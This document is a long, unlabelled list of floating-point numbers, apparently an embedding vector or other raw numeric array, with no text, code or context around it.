0.003034898079931736, 0.015425922349095345, -0.004791385028511286, -0.03807610645890236, 0.004508080892264843, -0.013109909370541573, 0.0008171560475602746, -0.04116412252187729, 0.004447878338396549, -0.0016405093483626842, 0.015312600880861282, -0.016346661373972893, 0.013471122831106186, -0.0014253751141950488, -0.02512909658253193, -0.004748889245092869, -0.004408924374729395, -0.006689524278044701, 0.016743287444114685, 0.029576975852251053, 0.011325092054903507, -0.00017474124615546316, -0.02167278341948986, -0.0016626424621790648, 0.013449874706566334, -0.020327087491750717, 0.008732857182621956, -0.028627905994653702, -0.018343957141041756, -0.018159810453653336, 0.00914364866912365, -0.02260768786072731, -0.017423218116164207, 0.018457278609275818, 0.033713217824697495, 0.023868393152952194, -0.0065018353052437305, -0.022026915103197098, -0.00616895267739892, -0.022182730957865715, -0.00956152193248272, -0.025469062849879265, -0.023330114781856537, -0.017862340435385704, -0.0013545489637181163, -0.005308415740728378, 0.04632026329636574, 0.0036617089062929153, -0.0013226772425696254, -0.007337583228945732, 0.020596226677298546, -0.014073144644498825, -0.033996522426605225, -0.023330114781856537, -0.011990857310593128, -0.02391088753938675, -0.05654755234718323, 0.015071792528033257, 0.006034383084625006, 0.02983194962143898, 0.01998712308704853, -0.003937930800020695, -0.014179383404552937, 0.012954091653227806, -0.023967549204826355, -0.02477496676146984, -0.02440667152404785, -0.015312600880861282, -0.012557465583086014, 0.011140944436192513, -0.004100830759853125, -0.008513296023011208, -0.019661322236061096, 0.0025090142153203487, 0.014391861855983734, 0.01206168346107006, -0.007043654564768076, 0.009710256941616535, -0.03011525422334671, -0.019576331600546837, -0.01913720928132534, -0.0025019317399710417, 0.034478142857551575, -0.003849398111924529, -0.008095421828329563, -0.0004012740682810545, 0.004323932807892561, -0.0015882750740274787, -0.01354903168976307, 0.007227802649140358, -0.027650505304336548, -0.014328118413686752, -0.01140300091356039, 0.012727448716759682, -0.00858412217348814, 0.03130513057112694, -0.00975275319069624, 0.022267723456025124, -0.03974760323762894, 0.013060331344604492, 0.011006374843418598, -0.0008835555054247379, -0.012309574522078037, -0.013449874706566334, 0.012628291733562946, -0.00415395013988018, -0.04898332431912422, 0.014561844058334827, -0.015610070899128914, -0.016346661373972893, 0.02512909658253193, 0.0145476795732975, 0.01847144402563572, 0.044422123581171036, -0.022069409489631653, 0.023967549204826355, 0.006554954685270786, -0.023797566071152687, 0.0035926534328609705, -0.01915137469768524, 0.01143841352313757, -0.017848175019025803, 0.011530487798154354, -0.026701435446739197, 0.009228639304637909, 0.010404353030025959, 0.03464812412858009, 0.027126392349600792, -0.011530487798154354, -0.002586923073977232, 0.00793252233415842, -0.01046101376414299, 0.02654561959207058, -0.014136888086795807, -0.02027042768895626, -0.012444144114851952, -0.02589401975274086, -0.0033571566455066204, -0.039350975304841995, -0.027523018419742584, -0.016530809924006462, -0.017848175019025803, 0.015029296278953552, 0.012599961832165718, -0.009646513499319553, -0.014066061936318874, 0.01327280979603529, 0.014944305643439293, -0.02552572265267372, -0.004547034855931997, -0.00619374169036746, -0.012252913787961006, 0.008456635288894176, -0.014250209555029869, 0.01604919135570526, 0.012784109450876713, 0.005177387036383152, 0.018457278609275818, -0.008350396528840065, 0.038784366101026535, -0.002158425049856305, -0.004943661391735077, 0.004996780771762133, -0.01988796703517437, 0.009922735393047333, 0.026843087747693062, 0.00031871741521172225, -0.013074496760964394, 0.01940634846687317, 0.0014289163518697023, -0.01082930900156498, -0.0025037024170160294, 0.008605370298027992, -0.0028525209054350853, -0.013634022325277328, -0.008945335634052753, 0.013067414052784443, -0.025284914299845695, -0.021261991932988167, -0.008286653086543083, 0.02935033291578293, 0.022069409489631653, -0.015822548419237137, -0.0029268881771713495, 0.006873672362416983, -0.011806709691882133, 0.01865559257566929, -0.020794540643692017, -0.005549224093556404, -0.025086602196097374, 0.029322002083063126, -0.01041851844638586, 0.04946494102478027, -0.021531131118535995, 0.0005325236706994474, 0.0028153371531516314, 0.010567252524197102, -0.013294056989252567, 0.021361149847507477, 0.00247537181712687, -0.011997940018773079, -0.008067091926932335, 0.01487347949296236, -0.02137531340122223, 0.0030897881370037794, -0.02374090626835823, 0.0038423154037445784, 0.019349688664078712, -0.0031800915021449327, -0.004897624254226685, -0.008499130606651306, -0.008747022598981857, -0.02749468944966793, -0.039435967803001404, 0.025199923664331436, -0.01633249595761299, 0.004812632687389851, -0.024987444281578064, 0.02007211372256279, -0.006197283044457436, 0.03430815786123276, -0.005467774346470833, -0.00776253966614604, 0.0031641556415706873, -0.02627648040652275, -0.011417166329920292, 0.0018432490760460496, 0.010050222277641296, -0.004369969945400953, -0.02831627056002617, -0.018273131921887398, -0.012281244620680809, 0.004433713387697935, 0.0006635519675910473, -0.005793574266135693, -0.005000322125852108, 0.0215594619512558, 0.07955186814069748, -0.01206168346107006, 0.009611100889742374, -0.005878565367311239, 0.005768785253167152, 0.008527461439371109, 0.02025626227259636, 0.0073871612548828125, 0.0328349769115448, -0.006831176578998566, 0.02888287976384163, 0.0019477175083011389, 0.0026099414099007845, -0.016063356772065163, -0.009703174233436584, 0.03274998441338539, -0.035413045436143875, 0.007330500520765781, 0.01857060194015503, 0.000833534577395767, 0.01810314878821373, -0.007720043882727623, 0.007493400480598211, 0.00010452381684444845, 0.009384457021951675, 0.008832013234496117, -0.009044491685926914, -0.019491340965032578, -0.0525246299803257, -0.017224906012415886, 0.009540274739265442, 0.0016750370850786567, 0.0046249437145888805, -0.0034811024088412523, 0.014243126846849918, -0.006473504938185215, 0.0014050125610083342, 0.040370870381593704, -0.03637627884745598, -0.005952932871878147, 0.007564226631075144, -0.010772648267447948, -0.028117958456277847, 0.0047559719532728195, 0.01552507933229208, -0.00781211769208312, 0.016757452860474586, -0.015468418598175049, -0.004734724294394255, 0.022366879507899284, -0.00008194799738703296, -0.017649861052632332, 0.010652244091033936, 0.00924280472099781, -0.004943661391735077, 0.004784302320331335, -0.02974695898592472, -0.017026592046022415, 0.0021424891892820597, -0.013067414052784443, 0.023655913770198822, 0.0065797436982393265, -0.01988796703517437, -0.0057475371286273, 0.005729830823838711, -0.021899428218603134, -0.009816496632993221, -0.002160195726901293, 0.01116219162940979, 0.008038761094212532, 0.0026400424540042877, -0.010354774072766304, 0.0035607817117124796, -0.00619374169036746, -0.0020008371211588383, -0.0017644549952819943, -0.016658296808600426, 0.020015453919768333, -0.014646835625171661, -0.004918871913105249, 0.018173975870013237, 0.018273131921887398, 0.00787586160004139, 0.032693322747945786, -0.018995556980371475, 0.011863370425999165, -0.010312278755009174, -0.0076492177322506905, -0.005917519796639681, 0.0007799723534844816, 0.001387306023389101, -0.002084057778120041, -0.002073433715850115, 0.012019187211990356, -0.0030951001681387424, 0.01603502780199051, -0.008222909644246101, -0.02231021784245968, -0.002569216536357999, -0.021134505048394203, -0.004812632687389851, 0.01922220177948475, 0.03331659361720085, -0.00792543962597847, -0.00638143066316843, -0.00097651471151039, -0.0016971701988950372, 0.002082287101075053, -0.025171592831611633, 0.0014147511683404446, -0.03436481952667236, 0.006431009154766798, 0.014703496359288692, -0.014944305643439293, 0.008272487670183182, 0.0006918823928572237, 0.027083897963166237, -0.010142296552658081, -0.013874831609427929, -0.014901809394359589, -0.0007330500520765781, 0.0017024821136146784, 0.021219497546553612, -0.017933165654540062, 0.006133539602160454, 0.01308866124600172, -0.0027090979274362326, -0.0021849849727004766, 0.0007644791039638221, -0.004642650485038757, 0.016941601410508156, 0.0045257871970534325, 0.016445819288492203, 0.0009968772064894438, 0.020667053759098053, 0.0030278153717517853, 0.04260897636413574, 0.015298435464501381, 0.00020550632325466722, -0.011544653214514256, -0.00717822415754199, 0.012033352628350258, 0.01978880912065506, -0.013428626582026482, 0.01866975799202919, -0.0005542141734622419, -0.008045843802392483, 0.010354774072766304, -0.01801815815269947, 0.012373317964375019, 0.01726740039885044, -0.04518704488873482, 0.014689330942928791, 0.012352069839835167, -0.020284593105316162, 0.014271457679569721, 0.0012589338002726436, -0.023103471845388412, -0.013379048556089401, -0.008109587244689465, 0.02280600182712078, 0.013754426501691341, 0.01858476549386978, -0.009689008817076683, 0.010390187613666058, 0.027168888598680496, -0.001736124511808157, -0.034761443734169006, -0.01658746972680092, 0.012182087637484074, 0.0049294959753751755, 0.0028702274430543184, -0.024888288229703903, 0.014745992608368397, 0.00604854803532362, 0.010531839914619923, 0.013506535440683365, -0.007351748179644346, 0.02869873307645321, -0.011955443769693375, -0.010893052443861961, -0.0015395821537822485, -0.0037537829484790564, -0.0076492177322506905, -0.011707552708685398, -0.007805035449564457, 0.006250402424484491, 0.002115929499268532, -0.041702400892972946, 0.006037924438714981, 0.016544975340366364, 0.051929689943790436, -0.01562423538416624, 0.015114287845790386, 0.0067638917826116085, -0.014505183324217796, -0.0060450066812336445, -0.0032066511921584606, 0.003640461014583707, -0.00759963970631361, -0.011565900407731533, -0.00327216531150043, -0.004961367696523666, -0.0022540404461324215, 0.0050605242140591145, -0.013556113466620445, -0.0002835257037077099, 0.01745154894888401, -0.0005497875390574336, 0.01018479187041521, -0.013577361591160297, -0.0007441166089847684, -0.010921383276581764, 0.0031712381169199944, 0.015595905482769012, -0.011863370425999165, -0.014930140227079391, -0.02252269722521305, -0.013832335360348225, -0.021460305899381638, -0.004299143794924021, -0.006778056733310223, -0.004161032848060131, 0.004543493967503309, -0.016346661373972893, 0.022947654128074646, 0.038699377328157425, -0.0337415486574173, 0.00859120488166809, 0.02053956687450409, -0.019533835351467133, -0.019378017634153366, 0.021233662962913513, 0.008102504536509514, -0.012394566088914871, -0.020879531279206276, -0.005106561351567507, 0.007783787325024605, 0.02147447131574154, -0.006742643658071756, 0.02147447131574154, -0.013471122831106186, -0.020397914573550224, -0.010517674498260021, -0.027353037148714066, -0.00017828255658969283, 0.00490116560831666, 0.010156461037695408, -0.01303200051188469, 0.005428819917142391, 0.011360504664480686, -0.010347692295908928, -0.014661001041531563, -0.024350009858608246, -0.008739939890801907, 0.015085957013070583, -0.0008720462210476398, -0.019916296005249023, -0.027707166969776154, -0.019023887813091278, 0.03328826278448105, -0.02187109738588333, -0.011183439753949642, 0.024038374423980713, -0.003576717572286725, 0.016998261213302612, -0.011636726558208466, -0.0060875024646520615, 0.0026294186245650053, 0.01265662256628275, 0.020142940804362297, -0.007089691702276468, 0.01838645339012146, -0.006976369768381119, -0.010694739408791065, -0.011480909772217274, -0.009788165800273418, -0.006919709034264088, 0.010843474417924881, -0.0022611229214817286, -0.00478076096624136, 0.04615028202533722, 0.016389157623052597, -0.03830274939537048, -0.0037360764108598232, -0.024435002356767654, -0.01631833054125309, -0.017324062064290047, 0.0006055630510672927, -0.020029619336128235, 0.005411113146692514, -0.03144678473472595, 0.012019187211990356, -0.029605306684970856, 0.01614834927022457, 0.02055373229086399, 0.011757130734622478, 0.017295731231570244, -0.022777670994400978, -0.015879210084676743, -0.006459339521825314, 0.03153177723288536, 0.003849398111924529, -0.0018768914742395282, -0.02082287147641182, -0.02100701816380024, -0.0039485543966293335, -0.01111969631165266, -0.014887643977999687, 0.012167922221124172, 0.005173846147954464, 0.003739617532119155, 0.021035348996520042, -0.01650247909128666, 0.0016909729456529021, -0.0022788294591009617, -0.017040757462382317, -0.013449874706566334, -0.015100122429430485, 0.017239071428775787, 0.019208036363124847, -0.016162514686584473, -0.017989827319979668, 0.0006192856235429645, -0.011835039593279362, 0.002785236109048128, -0.005538600496947765, -0.019108880311250687, -0.015312600880861282, -0.0021247826516628265, 0.005945850163698196, 0.01115510892122984, 0.034676454961299896, 0.000659125333186239, -0.007486317772418261, -0.000547131581697613, 0.0030720815993845463, -0.003750241594389081, -0.012769944034516811, -0.0016183762345463037, -0.032778315246105194, 0.020992852747440338, -0.0007069329149089754, 0.00886742677539587, 0.03056854009628296, -0.017692357301712036, 0.01668662764132023, 0.021431975066661835, -0.002096452284604311, -0.007500483188778162, -0.020043782889842987, 0.002675455529242754, -0.005960015580058098, 0.022749340161681175, -0.012925761751830578, 0.005906896200031042, 0.008654948323965073, 0.008392891846597195, 0.004649732727557421, -0.0197038184851408, -0.035583026707172394, -0.021063679829239845, -0.029860280454158783, 0.024435002356767654, 0.0010650473413988948, -0.019831305369734764, -0.03207005560398102, 0.012876183725893497, 0.005612967535853386, 0.002425793558359146, 0.004012297838926315, 0.008739939890801907, 0.032325029373168945, -0.0053792414255440235, -0.0025515099987387657, 0.013988153077661991, 0.014321035705506802, -0.03952096030116081, -0.011735883541405201, 0.026616444811224937, 0.014618504792451859, -0.005765243899077177, -0.012904513627290726, 0.007203013636171818, 0.008980748243629932, 0.0036174426786601543, -0.026233984157443047, -0.01688493974506855, 0.010298113338649273, -0.00022631148749496788, 0.0069374158047139645, 0.003757324069738388, 0.012585796415805817, 0.018825575709342957, 0.009604018181562424, 0.009830661118030548, 0.006873672362416983, 0.007833365350961685, -0.0038104436825960875, 0.003920224029570818, 0.012238748371601105, -0.020567897707223892, -0.0030331274028867483, 0.018329791724681854, -0.0001963210670510307, 0.011693387292325497, -0.006200824398547411, -0.020426245406270027, 0.014384779147803783, -0.02372674085199833, 0.013704848475754261, 0.01528427004814148, 0.013244478963315487, -0.011020539328455925, -0.00429206108674407, -0.01008563581854105, -0.0036156720016151667, 0.02187109738588333, -0.01658746972680092, 0.00011885503772646189, -0.0013288744958117604, 0.003327055601403117, -0.0018804327119141817, -0.026389801874756813, 0.009398622438311577, -0.018910566344857216, -0.006795763503760099, -0.0253415759652853, -0.006165411323308945, -0.004943661391735077, -0.007309252396225929, -0.0031092653516680002, -0.006013134960085154, -0.023429270833730698, 0.016063356772065163, 0.018910566344857216, -0.01612001843750477, -0.022494366392493248, -0.03351490572094917, 0.025398235768079758, -0.00027223778306506574, -0.0073446654714643955, 0.0009340191027149558, -0.000659125333186239, 0.008194578811526299, -0.006863048300147057, -0.024236688390374184, -0.0145476795732975, -0.01940634846687317, -0.0018016387475654483, 0.006785139441490173, 0.010149379260838032, 0.030341897159814835, 0.023188462480902672, -0.009391539730131626, 0.015695061534643173, 0.005304874386638403, 0.011247183196246624, -0.013867748901247978, 0.01903805322945118, 0.009356126189231873, -0.002898557810112834, -0.0022841414902359247, -0.0027834654320031404, 0.007769622374325991, 0.016304166987538338, 0.00567317008972168, 0.00918614398688078, -0.017239071428775787, -0.008874509483575821, -0.0020858284551650286, 0.003863563295453787, 0.013343635946512222, 0.004865752533078194, 0.018528105691075325, -0.012854935601353645, 0.002567445859313011, -0.023939218372106552, 0.012415814213454723, 0.009653596207499504, 0.0014050125610083342, -0.001784817548468709, -0.01393857505172491, 0.00008692796109244227, -0.003937930800020695, 0.026120662689208984, -0.0019813599064946175, 0.005198635160923004, 0.02073787897825241, -0.005531517788767815, 0.009922735393047333, -0.01679994910955429, -0.020397914573550224, 0.008647865615785122, 0.0182872973382473, 0.0031747794710099697, 0.000018425849702907726, 0.01743738353252411, 0.011636726558208466, -0.00797501765191555, -0.002517867600545287, -0.007663383148610592, 0.007557143922895193, -0.0054748570546507835, 0.007171141915023327, 0.00033753059688024223, 0.0021531132515519857, 0.00309687084518373, -0.010446848347783089, -0.018173975870013237, -0.0016201467951759696, -0.006027300376445055, -0.003690039273351431, -0.00520925922319293, -0.005496104713529348, 0.004752430599182844, 0.01364818774163723, -0.017465714365243912, -0.007309252396225929, -0.007890027016401291, 0.013456957414746284, 0.00591043708845973, -0.012592879123985767, -0.02280600182712078, -0.008775352500379086, 0.0016245734877884388, 0.0030207328964024782, -0.0013297598343342543, -0.020879531279206276, -0.020780375227332115, 0.02290515787899494, 0.0014758387114852667, -0.002358508761972189, -0.010772648267447948, -0.0029888609424233437, -0.0008366332040168345, 0.02062455751001835, -0.01725323498249054, -0.006232696119695902, -0.03068186342716217, 0.0015546326758340001, 0.010283948853611946, -0.001977818552404642, 0.011636726558208466, -0.0013970446307212114, -0.015794217586517334, 0.0042212349362671375, -0.004377052653580904, -0.023797566071152687, 0.005627132952213287, 0.005407572258263826, -0.006431009154766798, -0.00956152193248272, -0.028769558295607567, 0.008704526349902153, 0.0014528201427310705, -0.01566673070192337, 0.008832013234496117, 0.004741807002574205, 0.0030756229534745216, 0.005315497983247042, -0.012458309531211853, -0.0024488121271133423, 0.01998712308704853, -0.00388126983307302, -0.010347692295908928, 0.005740454886108637, 0.004674522206187248, 0.01167922280728817, -0.010283948853611946, -0.008506213314831257, -0.016360826790332794, -0.00788294430822134, 0.01111969631165266, -0.013839418068528175, -0.004118537064641714, 0.03311828151345253, -0.020029619336128235, -0.004313308745622635, -0.00654433062300086, 0.00848496612161398, -0.0017069088062271476, -0.04496040195226669, -0.011332174763083458, 0.005690876394510269, -0.021446140483021736, -0.007457987405359745, 0.0038458567578345537, -0.012068766169250011, -0.01041851844638586, 0.009044491685926914, 0.01987380161881447, -0.012040435336530209, 0.015142618678510189, 0.007139270193874836, 0.000970317458268255, -0.020851200446486473, 0.006172494031488895, -0.005871483124792576, 0.007585474289953709, 0.0017334686126559973, 0.02044041082262993, 0.0014448522124439478, -0.0229901485145092, 0.00010457915050210431, -0.0008229106315411627, -0.010751401074230671, -0.021531131118535995, 0.015879210084676743, -0.011983774602413177, -0.012677870690822601, 0.0073446654714643955, -0.005942309275269508, -0.015326766297221184, 0.01633249595761299, -0.001045570126734674, 0.0034881848841905594, 0.006101667881011963, -0.02381173148751259, -0.027253879234194756, 0.014618504792451859, 0.007457987405359745, -0.008081257343292236, -0.006600991822779179, 0.001853872905485332, -0.0012261767406016588, 0.004610778763890266, -0.014689330942928791, 0.0029888609424233437, -0.01650247909128666, 0.0032509176526218653, 0.0164316538721323, -0.002707327250391245, 0.01790483668446541, 0.0014138658298179507, 0.010283948853611946, -0.010978044010698795, 0.0003229227149859071, -0.0005794459721073508, -0.008442469872534275, -0.0018981392495334148, -0.027452193200588226, -0.032778315246105194, 0.002517867600545287, -0.021148670464754105, 0.004943661391735077, 0.018513940274715424, -0.027438027784228325, 0.0011234788689762354, 0.009101152420043945, -0.0027108686044812202, 0.025908183306455612, 0.009547357447445393, 0.02382589690387249, -0.011714635416865349, -0.014179383404552937, 0.002165507758036256, -0.0038352329283952713, -0.014129805378615856, -0.00028374703833833337, 0.010616831481456757, 0.007521730847656727, -0.025029940530657768, 0.004440796095877886, -0.012238748371601105, 0.002675455529242754, -0.015383427031338215, 0.025936514139175415, 0.005103019997477531, 0.010071470402181149, 0.013343635946512222, -0.001188107649795711, -0.0043947589583694935, -0.0028029426466673613, -0.010383104905486107, -0.011856287717819214, -0.024463331326842308, -0.011700470000505447, -0.018046487122774124, -0.0023230956867337227, -0.007741291541606188, -0.00028463234775699675, 0.0019246990559622645, -0.011629643850028515, 0.0020663512405008078, -0.01811731420457363, -0.01745154894888401, 0.012507887557148933, -0.01204751804471016, 0.0028967871330678463, -0.00222748052328825, 0.02813212387263775, 0.006912626326084137, -0.022820167243480682, -0.008782435208559036, -0.04513038694858551, -0.011969609186053276, 0.00412916112691164, -0.013619856908917427, 0.0009260511142201722, 0.021502802148461342, 0.004369969945400953, -0.004890541546046734, 0.006647028494626284, -0.007309252396225929, -0.005800656974315643, 0.013584444299340248, 0.001885744626633823, 0.015170948579907417, -0.00821582693606615, 0.017054922878742218, 0.010765565559267998, -0.009327796287834644, 0.006377889309078455, -0.008442469872534275, 0.017947331070899963, 0.007805035449564457, -0.013719013892114162, 0.01950550638139248, -0.007953770458698273, -0.023415105417370796, 0.017465714365243912, -0.005485480651259422, -0.0004966679844073951, 0.021120339632034302, 0.014391861855983734, -0.00859120488166809, -0.008832013234496117, -0.011601313948631287, 0.013258644379675388, -0.0025338034611195326, 0.00747923506423831, 0.029208680614829063, 0.011360504664480686, -0.000021662823201040737, -0.0107797309756279, 0.012911596335470676, -0.006955122109502554, -0.01299658790230751, -0.0014652147656306624, 0.028684567660093307, -0.02044041082262993, 0.0065903677605092525, 0.006572661455720663, 0.0005183584289625287, -0.018343957141041756, 0.0032172752544283867, -0.00541465450078249, -0.028018802404403687, 0.02055373229086399, -0.013294056989252567, 0.002436417620629072, -0.024987444281578064, -0.0136056924238801, 0.01633249595761299, -0.016559140756726265, -0.014129805378615856, -0.003930848091840744, 0.015822548419237137, -0.01426437497138977, -0.0036298371851444244, 0.008612453006207943, -0.000478961446788162, 0.04017255827784538, 0.0010057304752990603, 0.00948361400514841, 0.00797501765191555, -0.02609233185648918, -0.012175004929304123, -0.02083703689277172, -0.026219818741083145, -0.011268431320786476, 0.012472474947571754, -0.009497778490185738, 0.012791192159056664, 0.01650247909128666, 0.008314982987940311, -0.012203335762023926, 0.00793252233415842, -0.012267079204320908, 0.010978044010698795, -0.009873157367110252, -0.007982100360095501, -0.022281888872385025, 0.034194838255643845, 0.004550576210021973, -0.021644452586770058, 0.002834814367815852, -0.011835039593279362, -0.014816817827522755, -0.0037856546696275473, -0.024718305096030235, -0.014859314076602459, -0.004957826342433691, -0.008407057262957096, 0.011261348612606525, 0.0031800915021449327, 0.004490374121814966, -0.006554954685270786, -0.005145515315234661, -0.008697443641722202, -0.046008627861738205, -0.008987830951809883, 0.0031623849645256996, 0.016162514686584473, 0.0159358698874712, 0.012543301098048687, -0.020667053759098053, -0.004076041746884584, -0.0010314049432054162, -0.011785461567342281, 0.01801815815269947, -0.018358122557401657, 0.03300495818257332, -0.00946944858878851, 0.003123430535197258, -0.00886742677539587, 0.010907217860221863, 0.03527139499783516, 0.007897108793258667, 0.009164895862340927, 0.010099800303578377, -0.013704848475754261, -0.026715600863099098, -0.015000966377556324, -0.02092202752828598, -0.008137918077409267, -0.01429978758096695, 0.019576331600546837, -0.020029619336128235, -0.0034934969153255224, 0.0033925697207450867, -0.006505376659333706, -0.013711931183934212, -0.003004796802997589, 0.005007404834032059, -0.004596613347530365, -0.01397398766130209, -0.006292898207902908, 0.013874831609427929, 0.0007857269374653697, 0.006944498047232628, 0.016105853021144867, 0.026219818741083145, 0.01115510892122984, -0.012635374441742897, -0.012316657230257988, -0.006781598087400198, -0.013513618148863316, 0.0006719625671394169, -0.004281437024474144, 0.011544653214514256, -0.011969609186053276, 0.010269783437252045, 0.028769558295607567, -0.00891700480133295, -0.015213444828987122, -0.023797566071152687, -0.025851523503661156, -0.00715343514457345, -0.0028649154119193554, 0.01950550638139248, 0.007493400480598211, -0.00221508601680398, -0.006261026486754417, -0.012897430919110775, -0.025823192670941353, -0.007380078546702862, -0.035299722105264664, 0.010482261888682842, 0.017125748097896576, -0.01145257893949747, 0.0016281147254630923, 0.01491597481071949, 0.010191874578595161, -0.009596935473382473, -0.0033677807077765465, -0.019774645566940308, -0.050796471536159515, 0.007698796223849058, 0.020808706060051918, 0.004168115556240082, -0.0023354904260486364, -0.015879210084676743, -0.00010197850497206673, 0.014745992608368397, 0.015553409233689308, 0.0004085780237801373, -0.009830661118030548, -0.007698796223849058, 0.003856480587273836, 0.006009593605995178, -0.0008016627980396152, 0.03173008933663368, 0.02655978500843048, 0.00863370019942522, 0.007627970073372126, 0.008265404962003231, 0.005775867961347103, -0.007847530767321587, 0.007089691702276468, 0.01604919135570526, -0.009384457021951675, 0.02842959389090538, -0.010992209427058697, 0.030823515728116035, 0.008378726430237293, -0.007252591662108898, -0.010347692295908928, -0.003477561054751277, -0.0013589756563305855, 0.029095359146595, -0.010248535312712193, 0.02402421087026596, 0.019009722396731377, 0.003782113315537572, -0.0051915524527430534, -0.008796600624918938, -0.02569570578634739, 0.007897108793258667, 0.021077845245599747, 0.021403644233942032, -0.004851587116718292, -0.009157813154160976, 0.01487347949296236, -0.01209709607064724, 0.03575301170349121, 0.017933165654540062, -0.004111454822123051, -0.007029489614069462, 0.010390187613666058, 0.007890027016401291, 0.026049835607409477, -0.0016077522886916995, -0.02637563645839691, -0.002480683848261833, -0.0041787391528487206, -0.02823127992451191, 0.006473504938185215, -0.008499130606651306, -0.007415491621941328, -0.0047134761698544025, -0.0012784108985215425, -0.025964844971895218, -0.010708904825150967, -0.014420191757380962, -0.00923572201281786, -0.007079067640006542, -0.005067606922239065, 0.010864722542464733, -0.0007286234176717699, 0.02926534041762352, -0.008081257343292236, -0.005319039337337017, -0.02606400102376938, -0.012245831079781055, -0.004550576210021973, 0.007093233056366444, 0.030936837196350098, -0.025568218901753426, -0.022650184109807014, 0.0024204817600548267, 0.016190843656659126, 0.011792544275522232, 0.0024169404059648514, 0.022494366392493248, -0.02324512228369713, -0.013414462096989155, -0.003550157882273197, 0.02646062709391117, 0.0012394565856084228, -0.015794217586517334, 0.016063356772065163, -0.0029764664359390736, 0.001915845787152648, 0.003282789373770356, 0.0019016806036233902, -0.014434357173740864, -0.006565578747540712, -0.003153531812131405, -0.022551028057932854, -0.0035112034529447556, 0.008612453006207943, -0.00829373486340046, -0.004164574202150106, -0.01895306259393692, 0.0020079195965081453, 0.01790483668446541, 0.016814114525914192, -0.005056982859969139, -0.005056982859969139, 0.0022310218773782253, 0.015015131793916225, -0.0035926534328609705, 0.0006042351014912128, 0.008555792272090912, 0.010014809668064117, -0.010524757206439972, -0.0032934132032096386, -0.03821776062250137, -0.00538986548781395, -0.015921704471111298, -0.0029198057018220425, 0.0024151697289198637, -0.00309687084518373, 0.00037227963912300766, 0.003477561054751277, 0.011884618550539017, 0.014221878722310066, -0.002893245778977871, 0.01299658790230751, 0.012274161912500858, 0.00009013726958073676, -0.009703174233436584, 0.00712864613160491, 0.0008782435324974358, -0.001736124511808157, 0.0029215761460363865, -0.006778056733310223, -0.006785139441490173, -0.011686304584145546, 0.01204751804471016, 0.0005714780418202281, -0.01303200051188469, 0.003378404537215829, -0.01838645339012146, -0.0058254459872841835, -0.017876505851745605, -0.0034492306876927614, -0.013173652812838554, -0.003707745810970664, -0.012231665663421154, 0.015822548419237137, -0.008336231112480164, 0.010942631401121616, -0.0068949200212955475, 0.003976885229349136, -0.012019187211990356, -0.005754619836807251, 0.014859314076602459, 0.006137080956250429, 0.006516000255942345, -0.021318653598427773, 0.01790483668446541, 0.010822226293385029, -0.0014103245921432972, -0.00923572201281786, 0.015411757864058018, 0.0038848111871629953, -0.001983130583539605, 0.0019955250900238752, 0.020893696695566177, -0.02580902725458145, -0.012692035175859928, -0.008520378731191158, 0.004366428591310978, 0.021148670464754105, -0.015539244748651981, -0.010928465984761715, 0.002395692514255643, -0.008031678386032581, -0.00919322669506073, -0.012791192159056664, -0.007783787325024605, -0.015822548419237137, -0.0001489561254857108, 0.003644002368673682, -0.006459339521825314, -0.025469062849879265, 0.023004313930869102, -0.0009658908238634467, 0.003771489253267646, -0.021885262802243233, 0.004458502400666475, -0.004005215596407652, -0.013216149061918259, -0.011608396656811237, -0.019349688664078712, 0.008378726430237293, -0.007096774410456419, -0.012493722140789032, -0.008782435208559036, 0.01940634846687317, -0.002200920833274722, 0.002806483767926693, 0.0013757968554273248, 0.011523405089974403, 0.006423926446586847, 0.020879531279206276, 0.023429270833730698, -0.01491597481071949, 0.0124228959903121, -0.008074174635112286, -0.019023887813091278, -0.011920031160116196, -0.017777349799871445, 0.023018479347229004, 0.01679994910955429, 0.0077483742497861385, -0.020950358361005783, -0.0069834524765610695, 0.016573306173086166, -0.013570278882980347, 0.012167922221124172, -0.01267078798264265, 0.003782113315537572, -0.008357478305697441, 0.0018016387475654483, -0.006749726366251707, -0.002725033788010478, -0.017876505851745605, 0.013244478963315487, -0.010333526879549026, 0.006480587180703878, 0.002811795799061656, -0.009009079076349735, -0.006083961110562086, -0.005283626262098551, 0.00382106751203537, 0.0014793799491599202, -0.0051915524527430534, -0.008697443641722202, 0.004274354781955481, -0.007606722414493561, -0.011183439753949642, -0.005598802585154772, -0.0064487154595553875, -0.011502156965434551, -0.004182280506938696, -0.02731054089963436, -0.030880175530910492, -0.02823127992451191, -0.02187109738588333, 0.028372932225465775, 0.018740583211183548, -0.008314982987940311, 0.00031008548103272915, -0.009596935473382473, 0.00042163656326010823, -0.0059564742259681225, 0.00222748052328825, 0.0107938963919878, 0.012352069839835167, 0.004777220077812672, -0.019066384062170982, 0.009405705146491528, -0.007142811082303524, -0.042920611798763275, -0.006661193910986185, 0.005014487076550722, -0.018173975870013237, 0.008697443641722202, -0.00015448941849172115, 0.005931685212999582, -0.008761187084019184, 0.004543493967503309, -0.018811410292983055, -0.02187109738588333, 0.04668856039643288, -0.021970253437757492, -0.00776253966614604, -0.007249050308018923, -0.01772068813443184, 0.008229991421103477, -0.00830790027976036, 0.008754105307161808, -0.0043522631749510765, 0.004936578683555126, -0.014271457679569721, -0.00001708402851363644, 0.004518704488873482, 0.0061866589821875095, -0.002524950075894594, 0.014788487926125526, 0.032410018146038055, -0.002069892594590783, 0.0016582158859819174, 0.029888611286878586, -0.007663383148610592, 0.0159500353038311, -0.014434357173740864, 0.0006896690465509892, 0.007203013636171818, -0.0048870001919567585, -0.00017894654592964798, -0.02814628928899765, 0.004323932807892561, -0.0055208937264978886, 0.020284593105316162, -0.007096774410456419, -0.004911789204925299, -0.023939218372106552, -0.009016161784529686, 0.010666409507393837, 0.005124267656356096, -0.006558496039360762, -0.003341220784932375, -0.000447753700427711, 0.03705621138215065, 0.0028684567660093307, -0.006799304857850075, 0.00045262297498993576, 0.013888996094465256, -0.009249887429177761, -0.026772262528538704, -0.007220719940960407, -0.006452256813645363, 0.011261348612606525, -0.002749823033809662, -0.0007795296842232347, -0.020695384591817856, 0.01978880912065506, -0.004061876330524683, 0.029690297320485115, -0.014087309129536152, 0.01988796703517437, 0.0038104436825960875, 0.002594005549326539, 0.02223939262330532, -0.015085957013070583, 0.014561844058334827, -0.02420835755765438, 0.004678063094615936, -0.011863370425999165, 0.002269976306706667, -0.01678578369319439, -0.012699117884039879, -0.00788294430822134, 0.002884392626583576, 0.025837358087301254, 0.00269847409799695, -0.014618504792451859, 0.003302266588434577, 0.01932135783135891, 0.007118022069334984, 0.01275577861815691, 0.018443115055561066, 0.004416006617248058, 0.014604340307414532, 